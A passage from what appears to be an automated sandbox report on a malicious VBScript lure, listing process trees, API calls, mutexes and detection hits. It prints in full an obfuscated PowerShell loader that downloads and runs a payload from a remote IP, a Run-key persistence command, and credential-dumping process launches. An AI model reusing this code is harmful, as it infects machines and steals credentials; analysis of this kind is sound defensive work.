';$Holometaboly=Forkber 'Fili> afe ';$privatdetektiv=Forkber 'Bek iGenee Besx Ur ';$Homeokinetic = Forkber ' ArbeDaphcCoenh NonoAk i Mat %StigaS,etp JovpArchdChokaJewet Ca a,seg%S.an\ CenGUnsauPreta As.nPanca katmGoldiWav.nPreleVitt9Fyr..Tar j Uddu esedStav Hykl&Menk&Trun MaineGoddc Dath reko Ne, G.id$T.ic ';Landlers (Forkber 'S.ec$ ,fbgGgeplAfreoSekrbEquaaCardlTarp: LivDAtmoiLazasPraiiAllonpre t VareBuksg ,elrImpreUngar K.seT.trt Cor= Pai(Snevc Cham ,atdSpec .da/MashcSkuf .cu$Pul,HConfoMyc,mHypee PrioBevakdksli Bu n Buse eaktHolyiTrkkcGebr)L,bb ');Landlers (Forkber 'Grac$ .isgViadl SunoSovibUnfrareaclBuff:.aabPBefalfripaBindsF,rgtKajsi .acc,ildkRdklo P,rr .attProce PletStif7Pali=D.ba$Ki kBKph e osesGazek D gfTakstMon,i ,oegSt,ueNectl ClasKommeMarcsPrettConveUntrrBjr.aP,ivpLeveiConsenysarKnyssOver.SkemsGargp Ac lPagii KlatB,ad(Mado$AvanHGa go PollSauno rgm Phye.rsktFodba erb UnioDiarlSubby,idu)chia ');$Beskftigelsesterapiers=$Plastickortet7[0];Landlers (Forkber 'Robu$navngTagel MeloSc ebbeb.aFanel ube: lilP.igra,rilp ksia.rimlhur iWh.msModvtTaa.iProtcPala=.ronNBacoeAmphwKonf-Tra.OPre,b.arrjI.veeAppecIndvt Sup R,sSHal.yJol sMegatCausematmmTeak. StaNSa.ae .netTikr.VansWOffpeoverbRegiCGlycl Au,iFrugeThernFredtstac ');Landlers (Forkber 'Milj$BungP p.oaBou,pVulgaKnitlForsiTromsKonft FodiVrn.cInco.UsanHTou eKirtage,edRubieInf,r St s,ygi[Over$ OesoImpep,hags.rimtOpinrVenemSurssAcce]Unce=,olo$CantP StaeNonnnEne,tFai.aEff n BendKir,r.ggliSubfaTr.unAf o ');$Brudekjolernes=Forkber ' CenP neuaSacrpGleraDeltlFirei.ulcs klstLunciSo tcLugd.UnalD nfooVariwCollnColulwhooo Fa,aUb bdHydrFPel iImprl Su.ePhyt(Gluc$PlurBstr e .orsHjemkEx mfLes,tSkadiHe.tgArthe akulPan.sMerce Vals VertS.foePuybrA,lwaLgehpMu,di ProesporrNonasL kk,Kric$WholFThy l DimePrectAerooGlycp.orteAfm.rRadia L,vtHut.iLingoSk Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process Stats: CPU usage > 49%
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 13_2_0040DD85
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00401806 NtdllDefWindowProc_W, 13_2_00401806
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_004018C0 NtdllDefWindowProc_W, 13_2_004018C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_004016FD NtdllDefWindowProc_A, 14_2_004016FD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_004017B7 NtdllDefWindowProc_A, 14_2_004017B7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00402CAC NtdllDefWindowProc_A, 15_2_00402CAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00402D66 NtdllDefWindowProc_A, 15_2_00402D66
Source: C:\Windows\System32\wbem\WMIADAP.exe File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe File deleted: C:\Windows\System32\wbem\Performance\WmiApRpl.h Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B89BF42 1_2_00007FFD9B89BF42
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B89B196 1_2_00007FFD9B89B196
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_23027194 9_2_23027194
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_2301B5C1 9_2_2301B5C1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0044B040 13_2_0044B040
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0043610D 13_2_0043610D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00447310 13_2_00447310
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0044A490 13_2_0044A490
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0040755A 13_2_0040755A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0043C560 13_2_0043C560
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0044B610 13_2_0044B610
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0044D6C0 13_2_0044D6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_004476F0 13_2_004476F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0044B870 13_2_0044B870
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0044081D 13_2_0044081D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00414957 13_2_00414957
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_004079EE 13_2_004079EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00407AEB 13_2_00407AEB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0044AA80 13_2_0044AA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00412AA9 13_2_00412AA9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00404B74 13_2_00404B74
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00404B03 13_2_00404B03
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0044BBD8 13_2_0044BBD8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00404BE5 13_2_00404BE5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00404C76 13_2_00404C76
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00415CFE 13_2_00415CFE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00416D72 13_2_00416D72
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00446D30 13_2_00446D30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00446D8B 13_2_00446D8B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00406E8F 13_2_00406E8F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00405038 14_2_00405038
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0041208C 14_2_0041208C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_004050A9 14_2_004050A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0040511A 14_2_0040511A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0043C13A 14_2_0043C13A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_004051AB 14_2_004051AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00449300 14_2_00449300
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0040D322 14_2_0040D322
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0044A4F0 14_2_0044A4F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0043A5AB 14_2_0043A5AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00413631 14_2_00413631
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00446690 14_2_00446690
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0044A730 14_2_0044A730
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_004398D8 14_2_004398D8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_004498E0 14_2_004498E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0044A886 14_2_0044A886
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0043DA09 14_2_0043DA09
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00438D5E 14_2_00438D5E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00449ED0 14_2_00449ED0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0041FE83 14_2_0041FE83
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00430F54 14_2_00430F54
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_004050C2 15_2_004050C2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_004014AB 15_2_004014AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00405133 15_2_00405133
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_004051A4 15_2_004051A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00401246 15_2_00401246
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_0040CA46 15_2_0040CA46
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00405235 15_2_00405235
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_004032C8 15_2_004032C8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00401689 15_2_00401689
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00402F60 15_2_00402F60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 004169A7 appears 87 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 0044DB70 appears 41 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 004165FF appears 35 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00422297 appears 42 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00444B5A appears 37 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00413025 appears 79 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00416760 appears 69 times
Source: BRUFEN ORDER VAC442_7467247728478134247.vbs Initial sample: Strings found which are bigger than 50
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Subtruncated" /t REG_EXPAND_SZ /d "%Balancegang% -w 1 $Erhvervsvalget=(Get-ItemProperty -Path 'HKCU:\Martyrmines\').Pamphletical;%Balancegang% ($Erhvervsvalget)"
Source: amsi32_4944.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7008, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4944, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.phis.troj.spyw.expl.evad.winVBS@24/14@10/3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z, 13_2_004182CE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification, 15_2_00410DE1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z, 13_2_00418758
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle, 13_2_00413D4C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy, 13_2_0040B58D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Guanamine9.jud Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: \Sessions\1\BaseNamedObjects\jnbcourg-8XH6PE
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5996:120:WilError_03
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4852:120:WilError_03
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_syyrbntd.tkc.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BRUFEN ORDER VAC442_7467247728478134247.vbs"
Source: C:\Program Files (x86)\Windows Mail\wab.exe System information queried: HandleInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7008
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4944
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: wab.exe Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: wab.exe Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: wab.exe, 00000009.00000002.2945562840.00000000237C0000.00000040.10000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: wab.exe Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: wab.exe Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: wab.exe Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: wab.exe Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: BRUFEN ORDER VAC442_7467247728478134247.vbs ReversingLabs: Detection: 15%
Source: BRUFEN ORDER VAC442_7467247728478134247.vbs Virustotal: Detection: 16%
Source: C:\Program Files (x86)\Windows Mail\wab.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BRUFEN ORDER VAC442_7467247728478134247.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Disclosed = 1;$Urbaniserendes='Substrin';$Urbaniserendes+='g';Function Forkber($faktotummets){$Chevee=$faktotummets.Length-$Disclosed;For($Forsmaaendes=4; $Forsmaaendes -lt $Chevee; $Forsmaaendes+=(5)){$Diplomaterne+=$faktotummets.$Urbaniserendes.Invoke($Forsmaaendes, $Disclosed);}$Diplomaterne;}function Landlers($Heelless){. ($privatdetektiv) ($Heelless);}$Pentandrian=Forkber 'PrakMIntoo huczLangiCl,nlLizilLeopaTeen/Ti h5 Apo.Wise0Wair Biko(.yriWM rciCardnBrevdDiscoEkspw ,lisVeja quifNGeroTSome Modv1D wn0Suld. .eg0Outh;Foug CandWGsliiP.eonS es6Uro 4Adju; Apo Ov.xCo,c6 For4M sa;Skri ,arar.ubrvBere:Tr.e1Lapa2a.sc1Br,i. Fag0Sk,o)Hnge AmmoGGl eePantcDehykForgoButi/A,dr2Toem0Dict1Forb0Kold0Supe1Hane0Br.m1Beod sponFSemiiShear HypeP,infTranoM.crxAu o/ Per1Tilt2 .it1Intr.Saar0Ban ';$opstrms=Forkber 'PersUPsovs Mase Oger ,aa-BagsAfriggUdvleAffunRoyctJarn ';$Beskftigelsesterapiers=Forkber ' hulhstrutEftetTre,prids:axo,/Deci/ ver8Tros7Bek . Qua1 ewh2Lemm1 alf.Pyth1Ca.e0Cry,5Supe.Unce1Saxo6Pro 3 Ant/.eewHFloey PanlAnt askipsKonomNo,eu prosTele. FreoUnmocIncoxInte ';$Holometaboly=Forkber 'Fili> afe ';$privatdetektiv=Forkber 'Bek iGenee Besx Ur ';$Homeokinetic = Forkber ' ArbeDaphcCoenh NonoAk i Mat %StigaS,etp JovpArchdChokaJewet Ca a,seg%S.an\ CenGUnsauPreta As.nPanca katmGoldiWav.nPreleVitt9Fyr..Tar j Uddu esedStav Hykl&Menk&Trun MaineGoddc Dath reko Ne, G.id$T.ic ';Landlers (Forkber 'S.ec$ ,fbgGgeplAfreoSekrbEquaaCardlTarp: LivDAtmoiLazasPraiiAllonpre t VareBuksg ,elrImpreUngar K.seT.trt Cor= Pai(Snevc Cham ,atdSpec .da/MashcSkuf .cu$Pul,HConfoMyc,mHypee PrioBevakdksli Bu n Buse eaktHolyiTrkkcGebr)L,bb ');Landlers (Forkber 'Grac$ .isgViadl SunoSovibUnfrareaclBuff:.aabPBefalfripaBindsF,rgtKajsi .acc,ildkRdklo P,rr .attProce PletStif7Pali=D.ba$Ki kBKph e osesGazek D gfTakstMon,i ,oegSt,ueNectl ClasKommeMarcsPrettConveUntrrBjr.aP,ivpLeveiConsenysarKnyssOver.SkemsGargp Ac lPagii KlatB,ad(Mado$AvanHGa go PollSauno rgm Phye.rsktFodba erb UnioDiarlSubby,idu)chia ');$Beskftigelsesterapiers=$Plastickortet7[0];Landlers (Forkber 'Robu$navngTagel MeloSc ebbeb.aFanel ube: lilP.igra,rilp ksia.rimlhur iWh.msModvtTaa.iProtcPala=.ronNBacoeAmphwKonf-Tra.OPre,b.arrjI.veeAppecIndvt Sup R,sSHal.yJol sMegatCausematmmTeak. StaNSa.ae .netTikr.VansWOffpeoverbRegiCGlycl Au,iFrugeThernFredtstac ');Landlers (Forkber 'Milj$BungP p.oaBou,pVulgaKnitlForsiTromsKonft FodiVrn.cInco.UsanHTou eKirtage,edRubieInf,r St s,ygi[Over$ OesoImpep,hags.rimtOpinrVenemSurssAcce]Unce=,olo$CantP StaeNonnnEne,tFai.aEff n BendKir,r.ggliSubfaTr.unAf o ');$Brudekjolernes=Forkber ' CenP neuaSacrpGleraDeltlFirei.ulcs klstLunciSo tcLugd.UnalD nfooVariwCollnColulwhooo Fa,aUb bdHydrFPel iImprl Su.ePhyt(Gluc$PlurBstr e .orsHjemkEx mfLes,tSkadiHe.tgArthe akulPan.sMerce Vals VertS.foePuybrA,lwaLgehpMu,di ProesporrNonasL kk,Kric$WholFThy l DimePrectAerooGlycp.orteAfm.rRadia L,vtHut.iLingoSk
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Guanamine9.jud && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Disclosed = 1;$Urbaniserendes='Substrin';$Urbaniserendes+='g';Function Forkber($faktotummets){$Chevee=$faktotummets.Length-$Disclosed;For($Forsmaaendes=4; $Forsmaaendes -lt $Chevee; $Forsmaaendes+=(5)){$Diplomaterne+=$faktotummets.$Urbaniserendes.Invoke($Forsmaaendes, $Disclosed);}$Diplomaterne;}function Landlers($Heelless){. ($privatdetektiv) ($Heelless);}$Pentandrian=Forkber 'PrakMIntoo huczLangiCl,nlLizilLeopaTeen/Ti h5 Apo.Wise0Wair Biko(.yriWM rciCardnBrevdDiscoEkspw ,lisVeja quifNGeroTSome Modv1D wn0Suld. .eg0Outh;Foug CandWGsliiP.eonS es6Uro 4Adju; Apo Ov.xCo,c6 For4M sa;Skri ,arar.ubrvBere:Tr.e1Lapa2a.sc1Br,i. Fag0Sk,o)Hnge AmmoGGl eePantcDehykForgoButi/A,dr2Toem0Dict1Forb0Kold0Supe1Hane0Br.m1Beod sponFSemiiShear HypeP,infTranoM.crxAu o/ Per1Tilt2 .it1Intr.Saar0Ban ';$opstrms=Forkber 'PersUPsovs Mase Oger ,aa-BagsAfriggUdvleAffunRoyctJarn ';$Beskftigelsesterapiers=Forkber ' hulhstrutEftetTre,prids:axo,/Deci/ ver8Tros7Bek . Qua1 ewh2Lemm1 alf.Pyth1Ca.e0Cry,5Supe.Unce1Saxo6Pro 3 Ant/.eewHFloey PanlAnt askipsKonomNo,eu prosTele. FreoUnmocIncoxInte ';$Holometaboly=Forkber 'Fili> afe ';$privatdetektiv=Forkber 'Bek iGenee Besx Ur ';$Homeokinetic = Forkber ' ArbeDaphcCoenh NonoAk i Mat %StigaS,etp JovpArchdChokaJewet Ca a,seg%S.an\ CenGUnsauPreta As.nPanca katmGoldiWav.nPreleVitt9Fyr..Tar j Uddu esedStav Hykl&Menk&Trun MaineGoddc Dath reko Ne, G.id$T.ic ';Landlers (Forkber 'S.ec$ ,fbgGgeplAfreoSekrbEquaaCardlTarp: LivDAtmoiLazasPraiiAllonpre t VareBuksg ,elrImpreUngar K.seT.trt Cor= Pai(Snevc Cham ,atdSpec .da/MashcSkuf .cu$Pul,HConfoMyc,mHypee PrioBevakdksli Bu n Buse eaktHolyiTrkkcGebr)L,bb ');Landlers (Forkber 'Grac$ .isgViadl SunoSovibUnfrareaclBuff:.aabPBefalfripaBindsF,rgtKajsi .acc,ildkRdklo P,rr .attProce PletStif7Pali=D.ba$Ki kBKph e osesGazek D gfTakstMon,i ,oegSt,ueNectl ClasKommeMarcsPrettConveUntrrBjr.aP,ivpLeveiConsenysarKnyssOver.SkemsGargp Ac lPagii KlatB,ad(Mado$AvanHGa go PollSauno rgm Phye.rsktFodba erb UnioDiarlSubby,idu)chia ');$Beskftigelsesterapiers=$Plastickortet7[0];Landlers (Forkber 'Robu$navngTagel MeloSc ebbeb.aFanel ube: lilP.igra,rilp ksia.rimlhur iWh.msModvtTaa.iProtcPala=.ronNBacoeAmphwKonf-Tra.OPre,b.arrjI.veeAppecIndvt Sup R,sSHal.yJol sMegatCausematmmTeak. StaNSa.ae .netTikr.VansWOffpeoverbRegiCGlycl Au,iFrugeThernFredtstac ');Landlers (Forkber 'Milj$BungP p.oaBou,pVulgaKnitlForsiTromsKonft FodiVrn.cInco.UsanHTou eKirtage,edRubieInf,r St s,ygi[Over$ OesoImpep,hags.rimtOpinrVenemSurssAcce]Unce=,olo$CantP StaeNonnnEne,tFai.aEff n BendKir,r.ggliSubfaTr.unAf o ');$Brudekjolernes=Forkber ' CenP neuaSacrpGleraDeltlFirei.ulcs klstLunciSo tcLugd.UnalD nfooVariwCollnColulwhooo Fa,aUb bdHydrFPel iImprl Su.ePhyt(Gluc$PlurBstr e .orsHjemkEx mfLes,tSkadiHe.tgArthe akulPan.sMerce Vals VertS.foePuybrA,lwaLgehpMu,di ProesporrNonasL kk,Kric$WholFThy l DimePrectAerooGlycp.orteAfm.rRadia L,vtHut.iLingoSk
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Guanamine9.jud && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Subtruncated" /t REG_EXPAND_SZ /d "%Balancegang% -w 1 $Erhvervsvalget=(Get-ItemProperty -Path 'HKCU:\Martyrmines\').Pamphletical;%Balancegang% ($Erhvervsvalget)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Subtruncated" /t REG_EXPAND_SZ /d "%Balancegang% -w 1 $Erhvervsvalget=(Get-ItemProperty -Path 'HKCU:\Martyrmines\').Pamphletical;%Balancegang% ($Erhvervsvalget)"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mrynjuqqdntdz"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\otdfknajrvlikyvb"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\znrylxtlfddvmfrffvw"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Disclosed = 1;$Urbaniserendes='Substrin';$Urbaniserendes+='g';Function Forkber($faktotummets){$Chevee=$faktotummets.Length-$Disclosed;For($Forsmaaendes=4; $Forsmaaendes -lt $Chevee; $Forsmaaendes+=(5)){$Diplomaterne+=$faktotummets.$Urbaniserendes.Invoke($Forsmaaendes, $Disclosed);}$Diplomaterne;}function Landlers($Heelless){. ($privatdetektiv) ($Heelless);}$Pentandrian=Forkber 'PrakMIntoo huczLangiCl,nlLizilLeopaTeen/Ti h5 Apo.Wise0Wair Biko(.yriWM rciCardnBrevdDiscoEkspw ,lisVeja quifNGeroTSome Modv1D wn0Suld. .eg0Outh;Foug CandWGsliiP.eonS es6Uro 4Adju; Apo Ov.xCo,c6 For4M sa;Skri ,arar.ubrvBere:Tr.e1Lapa2a.sc1Br,i. Fag0Sk,o)Hnge AmmoGGl eePantcDehykForgoButi/A,dr2Toem0Dict1Forb0Kold0Supe1Hane0Br.m1Beod sponFSemiiShear HypeP,infTranoM.crxAu o/ Per1Tilt2 .it1Intr.Saar0Ban ';$opstrms=Forkber 'PersUPsovs Mase Oger ,aa-BagsAfriggUdvleAffunRoyctJarn ';$Beskftigelsesterapiers=Forkber ' hulhstrutEftetTre,prids:axo,/Deci/ ver8Tros7Bek . Qua1 ewh2Lemm1 alf.Pyth1Ca.e0Cry,5Supe.Unce1Saxo6Pro 3 Ant/.eewHFloey PanlAnt askipsKonomNo,eu prosTele. FreoUnmocIncoxInte 